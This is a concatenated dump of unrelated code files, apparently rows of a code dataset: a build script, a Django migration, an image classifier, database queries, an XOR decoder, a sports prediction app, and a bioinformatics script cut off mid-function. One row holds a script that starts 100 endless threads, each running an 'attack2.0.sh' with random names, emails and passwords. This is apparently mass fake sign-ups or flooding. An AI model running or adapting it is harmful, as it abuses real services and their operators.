# Default options (will be overriden by command line switches) #
################################################################
# Parallel build
SetOption('num_jobs', 4)
# include cache
SetOption('implicit_cache', 1)
##########################################################
# Command-line parameters (overriden by localconfig.py) #
##########################################################
buildVariables = Variables("localconfig.py")
buildVariables.Add(PathVariable("QTDIR", "Qt4 root directory", "/usr/share/qt4", PathVariable.PathIsDir))
buildVariables.Add(PathVariable("OGRE_HOME", "Ogre1.6 root directory (windows only)", None, PathVariable.PathIsDir))
buildVariables.Add(PathVariable("PTHREADWIN32_HOME", "PthreadWin32 root directory (windows only)", None, PathVariable.PathIsDir))
buildVariables.Add(PathVariable("ODE_HOME", "ODE 0.11 root directory", None, PathVariable.PathIsDir))
buildVariables.Add(BoolVariable("DEBUG", "If true, build in debug configuration", False))
buildVariables.Add(BoolVariable("FORCE_MINGW", "When both MinGW and VC++ are installed, force the use of the MinGW compiler instead of the default (windows only)", False))
buildVariables.Add(BoolVariable("DISABLE_GRAPH", "Disable dependency graph generation", False))
##############################################################################
# Variable value extraction (nasty, should be updated when the API evolves) #
# The reason for having this here is that we have to access variables before #
# we can create the real construction environment (for tools selection) #
##############################################################################
currentVariables = Environment(variables = buildVariables).Dictionary()
####################
# Base environment #
####################
baseTools = ["qt"]
if os.name == "nt":
if currentVariables["FORCE_MINGW"]:
baseTools.append("mingw")
else:
baseTools.append("default")
else:
baseTools.append("default")
baseEnvironment = Environment(tools = baseTools, variables = buildVariables)
# additional variables
baseEnvironment["OSNAME"] = os.name
baseEnvironment["SYSPATH"] = os.environ["PATH"].split(os.pathsep)
if baseEnvironment["CC"] == "cl":
baseEnvironment.AppendUnique(CPPFLAGS = ["/EHsc"])
# debug symbols vs. optimization
if baseEnvironment["DEBUG"]:
if baseEnvironment["CC"] == "cl":
baseEnvironment.AppendUnique(CPPFLAGS = ["/Z7"])
else:
baseEnvironment.AppendUnique(CPPFLAGS = ["-g"])
else:
if baseEnvironment["CC"] == "cl":
baseEnvironment.AppendUnique(CPPFLAGS = ["/Ox"])
else:
baseEnvironment.AppendUnique(CPPFLAGS = ["-O2"])
# Qt tool workaround
baseEnvironment.Replace(LIBS = [])
baseEnvironment.Replace(LIBPATH = [])
baseEnvironment.Replace(CPPPATH = [])
# Qt UI builder
uiBuilder = Builder(action = '$QT_UIC $QT_UICDECLFLAGS -o ${TARGETS[0]} $SOURCE')
baseEnvironment.Append(BUILDERS = {'Ui' : uiBuilder})
# Qt RC builder
rcBuilder = Builder(action = '$QT_BINPATH/rcc $QT_RCCDECLFLAGS -o ${TARGETS[0]} $SOURCE')
baseEnvironment.Append(BUILDERS = {'Rc' : rcBuilder})
# Under windows, add the platform SDK
if os.name == "nt" and baseEnvironment["CC"] == "cl":
import _winreg
key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, "Software\\Microsoft\\Microsoft SDKs\\Windows")
winSdkHome = _winreg.QueryValueEx(key, "CurrentInstallFolder")[0]
_winreg.CloseKey(key)
baseEnvironment["WINSDK_HOME"] = winSdkHome
baseEnvironment.AppendUnique(CPPPATH = ["$WINSDK_HOME/Include"])
baseEnvironment.AppendUnique(LIBPATH = ["$WINSDK_HOME/Lib"])
# Do not rely on VC++ runtime library
if os.name == "nt" and baseEnvironment["CC"] == "cl":
baseEnvironment.AppendUnique(CPPFLAGS = ["/MD"])
# Speed up change analysis
baseEnvironment.Decider('MD5-timestamp')
#####################
# Command-line help #
#####################
Help(buildVariables.GenerateHelpText(baseEnvironment))
##################################
# SCons environment declarations #
##################################
walker = build.DependencyWalker()
# external component database
for script in Glob("components.*.py"):
SConscript(script, exports = "walker", variant_dir = "build", duplicate = 0)
walker.makeEnvironments(baseEnvironment)
if not baseEnvironment["DISABLE_GRAPH"]:
walker.makeDependencyGraph("dependencies.png")
|
448 | 3b42e218acf1c93fab3a0893efa8bf32a274eb23 | # Generated by Django 2.2.6 on 2019-11-13 13:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('interface', '0010_auto_20191104_2107'),
]
operations = [
migrations.AlterField(
model_name='submission',
name='review_score',
field=models.DecimalField(decimal_places=2, editable=False, max_digits=5, null=True),
),
migrations.AlterField(
model_name='submission',
name='total_score',
field=models.DecimalField(decimal_places=2, editable=False, max_digits=5, null=True),
),
]
|
449 | 13b69ec61d6b2129f1974ce7cae91c84100b3b58 | import tensorflow.keras
from PIL import Image, ImageOps
from os import listdir
from os.path import isfile, join
import numpy as np
import glob
import cv2
np.set_printoptions(suppress = True)
# Load the model
model = tensorflow.keras.models.load_model('./converted_keras/keras_model.h5')
# Create the array of the right shape to feed into the keras model
# The 'length' or number of images you can put into the array is
# determined by the first position in the shape tuple, in this case 1.
data = np.ndarray(shape = (1, 224, 224, 3), dtype = np.float32)
path = glob.glob("/Users/zjisuoo/Documents/zjisuoo_git/OurChord/00_NOTE_DATA/TEST/*.png")
images = []
for image in path :
n1 = cv2.imread(image)
n2 = cv2.resize(n1, (244, 244))
images.append(n2)
print(image)
#turn the image int a numpy array
image_array = np.array(n2)
# Normalize the image
normalized_image_array = (image_array.astype(dtype = np.float32) / 127.0) - 1
# Load the image into the array
data = normalized_image_array
# run the inference
prediction = model.predict(data)
# print(prediction)
if(prediction[0][0] > 0.8):
print("2๋ถ์ํ")
elif(prediction[0][1] > 0.8):
print("4๋ถ์ํ")
elif(prediction[0][2] > 0.8):
print("8๋ถ์ํ")
elif(prediction[0][3] > 0.8):
print("16๋ถ์ํ")
else:
print("์ํ์๋") |
450 | 68d537cb8488ae4f2c8300e885be78540952dec0 | #!/usr/bin/env python2
# coding=utf8
from __future__ import absolute_import, division, print_function
from sqlalchemy import func
from walis.model.walis import walis_session
from walis.model.zeus import zeus_session, zeus_db_handler
from walis.model.zeus.activity import (
SubsidyProcessRecord,
SubsidyPayRecord,
ActivityStats,
)
from walis.model.walis.activity import PaymentNoticeRecord as NoticeRecord
from walis.utils.time import get_today_begin_time, get_today_end_time
MAX_LIST_SIZE = 1000
DEFAULT_LIST_SIZE = 200
def get_new_pay_records(process_at, limit=200):
with zeus_session() as session:
result = session.query(SubsidyPayRecord.id,
SubsidyPayRecord.restaurant_id,
SubsidyProcessRecord.card_id,
SubsidyProcessRecord.processed_at,
SubsidyPayRecord.status). \
outerjoin(SubsidyProcessRecord,
SubsidyProcessRecord.pay_record_id == SubsidyPayRecord.id). \
filter(SubsidyPayRecord.id > process_at). \
filter(SubsidyProcessRecord.status != SubsidyProcessRecord.STATUS_FAIL). \
order_by(SubsidyPayRecord.id.asc()).limit(limit).all()
return result
def get_success_pay_records(record_ids):
with zeus_session() as session:
result = session.query(SubsidyPayRecord.id,
SubsidyPayRecord.restaurant_id,
SubsidyProcessRecord.card_id,
SubsidyProcessRecord.processed_at,). \
outerjoin(SubsidyProcessRecord,
SubsidyProcessRecord.pay_record_id == SubsidyPayRecord.id). \
filter(SubsidyPayRecord.status == SubsidyPayRecord.STATUS_SUCCESS). \
filter(SubsidyProcessRecord.status != SubsidyProcessRecord.STATUS_FAIL). \
filter(SubsidyPayRecord.id.in_(record_ids)).all()
return result
def get_activity_stats(pay_record_id):
with zeus_session() as session:
results = session.query(ActivityStats.activity_id,
ActivityStats.activity_category_id,
func.sum(ActivityStats.total_subsidy),
func.min(ActivityStats.date),
func.max(ActivityStats.date),
func.sum(ActivityStats.quantity), ).group_by(
ActivityStats.restaurant_id, ActivityStats.activity_id,
ActivityStats.activity_category_id). \
filter(ActivityStats.pay_record_id == pay_record_id). \
filter(ActivityStats.status == ActivityStats.STATUS_PAY_SUCCESS).all()
return results
def get_success_record_ids_by_restaurant(
restaurant_id, activity_id=None, activity_category_id=None):
with zeus_session() as session:
query = session.query(SubsidyPayRecord.id). \
filter(SubsidyPayRecord.restaurant_id == restaurant_id). \
filter(SubsidyPayRecord.status == SubsidyPayRecord.STATUS_SUCCESS)
if activity_id is not None:
query.filter(SubsidyPayRecord.activity_id == activity_id)
if activity_category_id is not None:
query.filter(
SubsidyPayRecord.activity_category_id == activity_category_id)
record_ids = query.all()
return [r[0] for r in record_ids]
PAYLOG_STATUS_LIST = {
ActivityStats.STATUS_PAY_RECORD_GENERATED,
ActivityStats.STATUS_PAY_SUCCESS,
ActivityStats.STATUS_PAY_FAIL,
}
@zeus_db_handler
def query_paylog_by_rst(restaurant_id, activity_id=None,
activity_category_id=None, offset=None, limit=None):
""" Except ActivityStats.STATUS_PENDING ๏ผๆชๅฎกๆ ธ็ถๆ๏ผ
"""
q = session.query(
ActivityStats.pay_record_id,
ActivityStats.activity_id,
ActivityStats.activity_category_id,
ActivityStats.status,
func.min(ActivityStats.date),
func.max(ActivityStats.date),
func.sum(ActivityStats.quantity),
func.sum(ActivityStats.total_subsidy),
SubsidyPayRecord.created_at,
func.max(SubsidyProcessRecord.id)). \
group_by(ActivityStats.pay_record_id,
ActivityStats.activity_id,
ActivityStats.activity_category_id). \
outerjoin(SubsidyPayRecord,
SubsidyPayRecord.id == ActivityStats.pay_record_id). \
outerjoin(SubsidyProcessRecord,
SubsidyProcessRecord.pay_record_id == SubsidyPayRecord.id). \
filter(ActivityStats.restaurant_id == restaurant_id).\
filter(ActivityStats.status.in_(PAYLOG_STATUS_LIST)).\
order_by(SubsidyPayRecord.created_at.desc())
if activity_id is not None:
q = q.filter(ActivityStats.activity_id == activity_id)
if activity_category_id is not None:
q = q.filter(ActivityStats.activity_category_id == activity_category_id)
if limit is not None:
q = q.limit(min(limit, MAX_LIST_SIZE))
else:
q = q.limit(DEFAULT_LIST_SIZE)
if offset is not None:
q = q.offset(offset)
return q
@zeus_db_handler
def query_pay_records(restaurant_id, offset=None, limit=None):
q = session.query(SubsidyPayRecord).\
filter(SubsidyPayRecord.restaurant_id == restaurant_id).\
order_by(SubsidyPayRecord.created_at.desc())
if limit is not None:
q = q.limit(min(limit, MAX_LIST_SIZE))
else:
q = q.limit(DEFAULT_LIST_SIZE)
if offset is not None:
q = q.offset(offset)
return q.all()
@zeus_db_handler
def query_paylog(pay_record_ids, activity_id=None, activity_category_id=None,
offset=None, limit=None):
q = session.query(
ActivityStats.pay_record_id,
ActivityStats.activity_id,
ActivityStats.activity_category_id,
ActivityStats.status,
func.min(ActivityStats.date),
func.max(ActivityStats.date),
func.sum(ActivityStats.quantity),
func.sum(ActivityStats.total_subsidy)).\
group_by(ActivityStats.pay_record_id,
ActivityStats.activity_id,
ActivityStats.activity_category_id). \
filter(ActivityStats.pay_record_id.in_(pay_record_ids)).\
filter(ActivityStats.status.in_(PAYLOG_STATUS_LIST)).\
order_by(ActivityStats.created_at.desc())
if activity_id is not None:
q = q.filter(ActivityStats.activity_id == activity_id)
if activity_category_id is not None:
q = q.filter(ActivityStats.activity_category_id == activity_category_id)
if limit is not None:
q = q.limit(min(limit, MAX_LIST_SIZE))
else:
q = q.limit(DEFAULT_LIST_SIZE)
if offset is not None:
q = q.offset(offset)
return q
@zeus_db_handler
def get_max_subsidy_process_record_ids(pay_record_ids):
q = session.query(func.max(SubsidyProcessRecord.id)).\
group_by(SubsidyProcessRecord.pay_record_id).\
filter(SubsidyProcessRecord.pay_record_id.in_(pay_record_ids))
return q
@zeus_db_handler
def count_paylog_by_rst(restaurant_id, activity_id=None,
activity_category_id=None):
""" Except ActivityStats.STATUS_PENDING ๏ผๆชๅฎกๆ ธ็ถๆ๏ผ
"""
q = session.query(ActivityStats.id). \
group_by(ActivityStats.pay_record_id,
ActivityStats.activity_id,
ActivityStats.activity_category_id). \
filter(ActivityStats.restaurant_id == restaurant_id).\
filter(ActivityStats.status.in_(PAYLOG_STATUS_LIST))
if activity_id is not None:
q = q.filter(ActivityStats.activity_id == activity_id)
if activity_category_id is not None:
q = q.filter(ActivityStats.activity_category_id == activity_category_id)
return len(q.all())
@zeus_db_handler
def query_process_records_by_ids(process_ids):
query = session.query(SubsidyProcessRecord).\
filter(SubsidyProcessRecord.id.in_(process_ids))
return query.all()
@zeus_db_handler
def get_subsidy_record_process_time(record_ids, status):
return session.query(
SubsidyProcessRecord.pay_record_id,
SubsidyProcessRecord.processed_at).\
filter(SubsidyProcessRecord.pay_record_id.in_(record_ids)).\
filter(SubsidyProcessRecord.status == status).all()
def get_pay_activities_by_restaurant(rst_id):
with zeus_session() as session:
query = session.query(
ActivityStats.activity_id,
ActivityStats.activity_category_id,). \
group_by(ActivityStats.activity_id,
ActivityStats.activity_category_id). \
filter(ActivityStats.restaurant_id == rst_id)
return query.all()
# javis model begins
def query_sms_send_info(start_time=None, end_time=None, phone=None,
restaurant_id=None, card_num_tail=None, status=None):
with walis_session() as session:
query = session.query(NoticeRecord)
if phone:
query = query.filter(NoticeRecord.phone == phone)
if restaurant_id:
query = query.filter(NoticeRecord.restaurant_id == restaurant_id)
if card_num_tail:
query = query.filter(NoticeRecord.card_num_tail == card_num_tail)
if status:
query = query.filter(NoticeRecord.status == status)
if not start_time:
start_time = get_today_begin_time()
if not end_time:
end_time = get_today_end_time()
query = query.filter(NoticeRecord.created_at > start_time).\
filter(NoticeRecord.created_at < end_time)
return query.all()
def query_sms_send_count(start_time=None, end_time=None, status=None):
with walis_session() as session:
if not start_time:
start_time = get_today_begin_time()
if not end_time:
end_time = get_today_end_time()
query = session.query(func.count(NoticeRecord.record_id)).\
filter(NoticeRecord.created_at > start_time).\
filter(NoticeRecord.created_at < end_time)
if status is not None:
query = query.filter(NoticeRecord.status == status)
return query.scalar()
@zeus_db_handler
def query_auto_pay_activity_stats_result(
city_ids=None, restaurant_ids=None, activity_id=None,
activity_category_id=None, from_date=None, to_date=None, statuses=None,
offset=None, limit=None, with_subsidy=None):
q = session.query(ActivityStats.restaurant_id,
ActivityStats.activity_id,
ActivityStats.activity_category_id,
func.sum(ActivityStats.quantity),
func.sum(ActivityStats.total_subsidy),
func.min(ActivityStats.date),
func.max(ActivityStats.date)).\
group_by(ActivityStats.restaurant_id,
ActivityStats.activity_id,
ActivityStats.activity_category_id).\
order_by(ActivityStats.restaurant_id.desc())
return _query_activity_stats(
q, city_ids, restaurant_ids, activity_id,
activity_category_id, from_date, to_date, statuses,
with_subsidy, offset, limit)
def _query_activity_stats(
q, city_ids=None, restaurant_ids=None, activity_id=None,
activity_category_id=None, from_date=None, to_date=None, statuses=None,
with_subsidy=None, offset=None, limit=None):
if activity_id is not None:
q = q.filter(ActivityStats.activity_id == activity_id)
if activity_category_id is not None:
q = q.filter(ActivityStats.activity_category_id == activity_category_id) # noqa
if city_ids is not None:
q = q.filter(ActivityStats.city_id.in_(city_ids))
if restaurant_ids is not None:
q = q.filter(ActivityStats.restaurant_id.in_(restaurant_ids))
if from_date is not None:
q = q.filter(ActivityStats.date >= from_date)
if to_date is not None:
q = q.filter(ActivityStats.date <= to_date)
if statuses is not None:
q = q.filter(ActivityStats.status.in_(statuses))
if with_subsidy is not None:
if with_subsidy:
q = q.filter(ActivityStats.total_subsidy > 0)
else:
q = q.filter(ActivityStats.total_subsidy == 0)
if offset is not None:
q = q.offset(offset)
q = q.limit(1000)
return q
|
451 | a32fb683f8d46f901e8dcd2d075ace22ee81e076 | import base64
import string
def hexStringtoBytes(hexstring):
byteArray = bytes.fromhex(hexstring)
return byteArray
def xorBytes(bytes1, bytes2):
xored = bytes([x^bytes2[i] for i,x in enumerate(bytes1)])
return xored
def xorAgainstCharacter(byteArray, character):
str2 = [ord(character)] * len(byteArray)
return xorBytes(byteArray,str2)
def scoreString(input):
arr = [(chr(x) in string.printable) for x in input]
return arr.count(True)
if __name__ == "__main__":
hexstring = '1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736'
bytes1 = hexStringtoBytes(hexstring)
scores = []
for x in string.printable:
temp = xorAgainstCharacter(bytes1, x)
print(str(x), str(temp))
scores.append(scoreString(temp))
|
452 | b9c058bdb04df93beb379d05939b00f4db423cd3 | import string
import random
import os
from threading import Thread
class Process(Thread):
def __init__(self):
Thread.__init__(self)
def run(self):
while True:
prenom = id_generator(random.randint(4, 8))
nom = id_generator(random.randint(4, 8))
password = id_generator(random.randint(4, 8))
mail = id_generator(random.randint(4, 8)) + '.' + id_generator(random.randint(4, 8))
command = "sh attack2.0.sh " + prenom + " " + mail + " " + nom + " " + password
os.system(command)
print "\n" + mail
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
i = 0
while i < 100:
thread_1 = Process()
thread_1.start()
i = i + 1
|
453 | 9b581df505765e895047584c5bb586faef95295f | import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_table as dt
import plotly.express as px
import pandas as pd
import plotly.graph_objects as go
import numpy as np
from datetime import datetime as dat
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn import metrics
from sklearn.feature_selection import f_regression
from sklearn.feature_selection import SelectKBest
# TODO:
# The model doesn't really take the opponent into consideration when calculating the win percentage. As you would expect, this is not ideal and is something that needs to be fixed
#
# The bar charts only graph 2019 data. Allowing the user to choose the year would be an easy addition. Future implemenatations could also include a previous X games option instead
#
# The bar chart only graphs stats correctly if they are selected in order. For example, if the set of possible stats are ['assists', 'rebounds', 'blocks'], they must all be selected
# in order to show all the values correctly. If the user selects only 'assists' and 'blocks' then 'assists' graphs correctly. 'blocks' is graphed but is given the value assigned
# to 'rebounds' because it assumes the second position in the array of stats to be graphed.
#
# The model doesn't run well (and generally fails) for small schools due to a lack of data for those teams. Error checking needs to be implemented to eliminate this problem.
def getStatsByYear(teamID, year, data):
''' Returns the stats for a chosen team for a specific year. Choices are 2016 - 2019 '''
teamStats = data[data["team_id"] == teamID]
for index, row in teamStats.iterrows():
if (row["season"] == year):
teamStatsForGivenYear = teamStats[data["season"] == row["season"]]
return teamStatsForGivenYear
def generate_bar_chart(team, opponent, stats, stat_names, data):
''' Generates a bar chart for a the user selected team, opponent and stats '''
teamStats = getStatsByYear(team, 2019, data)
opponentStats = getStatsByYear(opponent, 2019, data)
teamStatValues = teamStats[["assists", "assists_turnover_ratio", "blocked_att", "blocks", "defensive_rebounds", "fast_break_pts",
"field_goals_att", "field_goals_pct", "field_goals_made", "free_throws_att",
"free_throws_pct", "free_throws_made", "offensive_rebounds", "personal_fouls",
"points", "points_against", "points_in_paint", "points_off_turnovers",
"rebounds", "second_chance_pts", "steals", "team_rebounds", "three_points_att",
"three_points_pct", "three_points_made", "turnovers", "two_points_att",
"two_points_pct", "two_points_made"
]]
opponentStatValues = opponentStats[["assists", "assists_turnover_ratio", "blocked_att", "blocks", "defensive_rebounds", "fast_break_pts",
"field_goals_att", "field_goals_pct", "field_goals_made", "free_throws_att",
"free_throws_pct", "free_throws_made", "offensive_rebounds", "personal_fouls",
"points", "points_against", "points_in_paint", "points_off_turnovers",
"rebounds", "second_chance_pts", "steals", "team_rebounds", "three_points_att",
"three_points_pct", "three_points_made", "turnovers", "two_points_att",
"two_points_pct", "two_points_made"
]]
stats_to_be_graphed = []
for i in range(len(stat_names)):
if i in stats:
stats_to_be_graphed.append(stat_names[i])
# Graphs average stat values for the user's chosen team
teamVals = go.Bar(
x = stats_to_be_graphed,
y = teamStatValues.mean(),
name = data[(data.team_id == team)]['market'].iloc[0]
)
# Graphs average stat values for the opponent's team
opponentVals = go.Bar(
x = stats_to_be_graphed,
y = opponentStatValues.mean(),
name = data[(data.team_id == opponent)]['market'].iloc[0]
)
data = [teamVals, opponentVals]
layout = go.Layout(barmode = 'group')
fig = go.Figure(data = data, layout = layout)
return fig
def getAllTeamMatchRecords(teamID, df):
''' Returns all game records for a given teamID '''
return df[df["team_id"] == teamID]
def select_features(X_train, y_train, X_test):
''' Selects features '''
# configure to select all features
fs = SelectKBest(score_func=f_regression, k='all')
# learn relationship from training data
fs.fit(X_train, y_train)
# transform train input data
X_train_fs = fs.transform(X_train)
# transform test input data
X_test_fs = fs.transform(X_test)
return X_train_fs, X_test_fs, fs
def overallFeatures(df):
''' Return list of top four features '''
datasetForFS = df
datasetForFS.fillna(0)
X1 = datasetForFS[["assists","blocks","defensive_rebounds","opponent_drb","fast_break_pts","points_in_paint","points_off_turnovers","rebounds","steals","turnovers","efg","tov_pct","orb_pct","ftr"]]
y1 = datasetForFS['win']
X_train, X_test, y_train, y_test = train_test_split(X1, y1, test_size=0.2, random_state=0)
X_train_fs, X_test_fs, fs = select_features(X_train, y_train, X_test)
colList = X1.columns.values.tolist()
statScoreDF = pd.DataFrame(data={'Stat': pd.Series(colList), 'Score': pd.Series(fs.scores_.tolist())})
statScoreDF = statScoreDF.sort_values(by=['Score'], ascending=False)
return statScoreDF.head(n=4)['Stat'].tolist()
def avgDataRow(df):
''' Returns the average values of a dataFrame '''
df1 = dict()
for (columnName, columnData) in df.iteritems():
df1[columnName] = [df[columnName].mean()]
return pd.DataFrame(df1)
def updateWinPct(dfMain, dfWin, reg):
''' Return new win percentage '''
dfPred = reg.predict(dfMain)
return pd.DataFrame({'Actual': dfWin.mean(), 'Predicted (int)': np.around(dfPred), 'Predicted (float)': dfPred})
def filterRowsFS(df):
''' Return dataframe with selected features '''
return df[["assists","blocks","defensive_rebounds","opponent_drb","fast_break_pts","points_in_paint","points_off_turnovers","rebounds","steals","turnovers","efg","tov_pct","orb_pct","ftr"]]
def learn(dataset):
''' Trains the model '''
dataset = pd.read_csv("team_boxscores_v3.csv")
dataset = dataset.fillna(0)
# Shuffle
dataset = dataset.sample(frac = 1)
X1 = dataset[["assists","blocks","defensive_rebounds","opponent_drb","fast_break_pts","points_in_paint","points_off_turnovers","rebounds","steals","turnovers","efg","tov_pct","orb_pct","ftr"]]
y1 = dataset['win']
# No shuffle
# X_train, X_test, y_train, y_test = train_test_split(X1, y1, test_size=0.2, random_state=0)
# W/ shuffle
X_train = X1[int(len(X1)/5):]
X_test = X1[:int(len(X1)/5)]
y_train = y1[int(len(y1)/5):]
y_test = y1[:int(len(y1)/5)]
regressor = LinearRegression()
regressor.fit(X_train, y_train)
coeff_df = pd.DataFrame(regressor.coef_, X1.columns, columns=['Coefficient'])
y_pred = regressor.predict(X_test)
y_pred_round = np.around(regressor.predict(X_test))
return regressor, pd.DataFrame({'Actual': y_test, 'Predicted (int)': y_pred_round, 'Predicted (float)': y_pred})
def calculate_win_percentage(team, stat1, stat2, stat3, stat4, regressor, data):
''' Calculates the win percentage for a team and the 4 selected stat values '''
temp = getAllTeamMatchRecords(team, data)
changed_stat1 = overallFeatures(temp)[0]
changed_stat2 = overallFeatures(temp)[1]
changed_stat3 = overallFeatures(temp)[2]
changed_stat4 = overallFeatures(temp)[3]
average_team_stats = avgDataRow(filterRowsFS(temp))
dfWin = temp["win"]
dfFinal = pd.DataFrame({'Actual': dfWin.mean(), 'Predicted (int)': np.around(regressor.predict(average_team_stats)), 'Predicted (float)': regressor.predict(average_team_stats)})
origWinPct = dfFinal.at[0, 'Predicted (float)']
average_team_stats.at[0, changed_stat1] = stat1
average_team_stats.at[0, changed_stat2] = stat2
average_team_stats.at[0, changed_stat3] = stat3
average_team_stats.at[0, changed_stat4] = stat4
win_percentage = updateWinPct(average_team_stats, dfWin, regressor).at[0,'Predicted (float)']
# Makes sure you can't have a win percentage of > 100% or < 0%
if win_percentage > 1:
win_percentage = 1
elif win_percentage < 0:
win_percentage = 0
win_percentage = win_percentage * 100
win_percentage = round(win_percentage, 2)
win_percentage_text = "Projected Win Percentage: " + str(win_percentage) + "%"
return win_percentage_text
def get_default_slider_values(team, data):
''' Gets the values the each of the 4 sliders should display. These values are what the model estimates the team will get in the matchup '''
numSliders = 4
stat_column_names = []
stat_column_values = []
estimated_stat_values = avgDataRow(filterRowsFS(getAllTeamMatchRecords(team, data)))
for i in range(numSliders):
stat_column_names.append(overallFeatures(getAllTeamMatchRecords(team, data))[i])
stat_column_values.append(estimated_stat_values.at[0, stat_column_names[i]])
return stat_column_names, stat_column_values |
454 | fdcee5b3f6b3ec170c9ef3017e0cc6c4b28cf22d | from django.contrib import admin
from .models import Advert, Category, ImageAd
@admin.register(Advert)
class AdminAdvert(admin.ModelAdmin):
filter_horizontal = "categories",
@admin.register(Category)
class AdminCategory(admin.ModelAdmin):
pass
@admin.register(ImageAd)
class AdminImageAd(admin.ModelAdmin):
pass
|
455 | ae5f87f1c383478ea5f370af1c85d63a472a7788 | #Array In Python
from array import array
numbers = array("i",[1,2,3])
numbers[0] = 0
print(list(numbers))
|
456 | 9c05b39a12ab29db99397e62315efddd8cdf1df4 | dict1 = [
{'a':1},
{'a':2},
{'a':3}
]
a = dict1[1]['a']
# print(a)
correlation_dict = {'${class_id}':123}
data = {'token': '${self.token}', 'name': 'apiๆต่ฏ','class_id': '${class_id}'}
for k in data:
for key in correlation_dict:
if data[k] in key:
data[k] = correlation_dict[key]
print(data)
|
457 | 2467825d2cb01c86d3ba27562decc12551877af1 | """
Script: coverage.py
Identifies domains that only occur in multi-domain proteins. The main
script is master.
--------------------
Felix A Kruger
momo.sander@ebi.ac.uk
"""
####
#### import modules.
####
import queryDevice
import operator
import yaml
import time
####
#### Load parameters.
####
paramFile = open('local.yaml')
params = yaml.safe_load(paramFile)
paramFile.close()
#### Define functions.
#-----------------------------------------------------------------------------------------------------------------------
def get_el_targets(params):
"""Query the ChEMBL database for (almost) all activities that are subject to the mapping. Does not conver activities expressed in log-conversion eg pIC50 etc. This function works with chembl_15 upwards. Outputs a list of tuples [(tid, target_type, domain_count, assay_count, act_count),...]
"""
data = queryDevice.queryDevice("""
SELECT DISTINCT dc.tid, dc.target_type, dc.dc, COUNT(DISTINCT act.assay_id), COUNT(DISTINCT activity_id)
FROM assays ass
JOIN(
SELECT td.tid, td.target_type, COUNT(cd.domain_id) as dc
FROM target_dictionary td
JOIN target_components tc
ON tc.tid = td.tid
JOIN component_sequences cs
ON cs.component_id = tc.component_id
JOIN component_domains cd
ON cd.component_id = cs.component_id
WHERE td.target_type IN('SINGLE PROTEIN', 'PROTEIN COMPLEX')
GROUP BY td.tid
) as dc
ON dc.tid = ass.tid
JOIN activities act
ON act.assay_id = ass.assay_id
WHERE act.standard_type IN('Ki','Kd','IC50','EC50', 'AC50')
AND ass.relationship_type = 'D'
AND assay_type IN('B')
AND act.standard_relation IN('=')
AND standard_units = 'nM'
AND standard_value <= %s
GROUP BY dc.tid ORDER BY COUNT(activity_id)""" % (int(params['threshold']) * 1000) , params)
print "retrieved data for ", len(data), "tids."
return data
#-----------------------------------------------------------------------------------------------------------------------
def readfile(path, key_name, val_name):
"""Read two columns from a tab-separated file into a dictionary.
Inputs:
path -- filepath
key_name -- name of the column holding the key
val_name -- name of the column holding the value
"""
infile = open(path, 'r')
lines = infile.readlines()
infile.close()
lkp = {}
els = lines[0].rstrip().split('\t')
for i, el in enumerate(els):
if el == key_name:
key_idx = i
if el == val_name:
val_idx = i
for line in lines[1:]:
elements = line.rstrip().split('\t')
lkp[elements[key_idx]] = elements[val_idx]
return lkp
#-----------------------------------------------------------------------------------------------------------------------
def get_archs(el_targets, pfam_lkp):
"""Find multi-domain architectures.
Inputs:
el_targets -- list of eligible targets
"""
act_lkp = {}
arch_lkp = {}
dom_lkp = {}
for ent in el_targets:
try:
doms = pfam_lkp[ent[0]]
except KeyError:
print "no doms in ", ent[0]
arch = ', '.join(sorted(doms))
try:
arch_lkp[arch] += 1
act_lkp[arch] += ent[4]
except KeyError:
arch_lkp[arch] = 1
act_lkp[arch] = ent[4]
if len(doms) <= 1:
continue
for dom in set(doms):
try:
dom_lkp[dom] += 1
except KeyError:
dom_lkp[dom] = 1
return(arch_lkp, dom_lkp, act_lkp)
#-----------------------------------------------------------------------------------------------------------------------
def get_doms(tids, params):
"""Get domains for a list of tids.
Inputs:
el_targets -- list of eligible targets
"""
pfam_lkp = {}
tidstr = "', '".join(str(t) for t in tids)
data = queryDevice.queryDevice("""
SELECT tid, domain_name
FROM target_components tc
JOIN component_domains cd
ON cd.component_id = tc.component_id
JOIN domains d
ON d.domain_id = cd.domain_id
WHERE tc.tid IN('%s') and domain_type = 'Pfam-A'""" %tidstr, params)
for ent in data:
tid = ent[0]
dom = ent[1]
try:
pfam_lkp[tid].append(dom)
except KeyError:
pfam_lkp[tid] = [dom]
return pfam_lkp
#-----------------------------------------------------------------------------------------------------------------------
def count_valid(lkp, valid_doms):
"""Get count of architectures and activities covered by the mapping.
"""
valz = []
for arch in lkp.keys():
valid = False
doms = arch.split(', ')
for dom in doms:
if dom in valid_doms:
valid = True
break
valz.append((lkp[arch], valid))
valid = sum([x[0] for x in valz if x[1]])
allz = sum([x[0] for x in valz])
valid_archs = len([x[0] for x in valz if x[1]])
all_archs = len(sum([x[0] for x in valz]))
out = open('data/log.tab', 'a')
timestamp = time.strftime('%d %B %Y %T', time.gmtime())
comment = "only binding assays"
release = params['release']
threshold = params['threshold']
out.write("%(valid)s\t%(allz)s\t%(release)s\t%(threshold)s\t%(comment)s\t%(timestamp)s\t%(valid_archs)s\t%(all_archs)s\n"
% locals())
out.close()
#-----------------------------------------------------------------------------------------------------------------------
def export_archs(arch_lkp, valid_doms, path):
'''Write out multi-domain architectures in markdown tables.
Inputs:
arch_lkp -- dictionary of multi-domain architectures.
'''
sorted_archs = sorted(arch_lkp.iteritems(), key=operator.itemgetter(1), reverse = True)
out = open('%s.md' % path ,'w')
out.write('|architecture|count|mapped|\n')
out.write('|:-----------|:---------|-----:|\n')
for arch in sorted_archs:
doms = str(arch[0]).split(', ')
if len(doms) <= 1:
continue
mapped = ', '.join([x for x in doms if x in valid_doms])
if len(mapped) == 0:
mapped = False
out.write("|%s|%s|%s|\n"%(arch[0], arch[1], mapped))
#-----------------------------------------------------------------------------------------------------------------------
def export_network(arch_lkp, valid_doms, path):
'''Write out network file.
Inputs:
arch_lkp -- dictionary of multi-domain architectures.
'''
lkp = {}
for arch in arch_lkp.keys():
doms = arch.split(', ')
if len(doms) <= 1:
continue
count = arch_lkp[arch]
if type(doms) is str:
continue
for i in range(len(doms)-1):
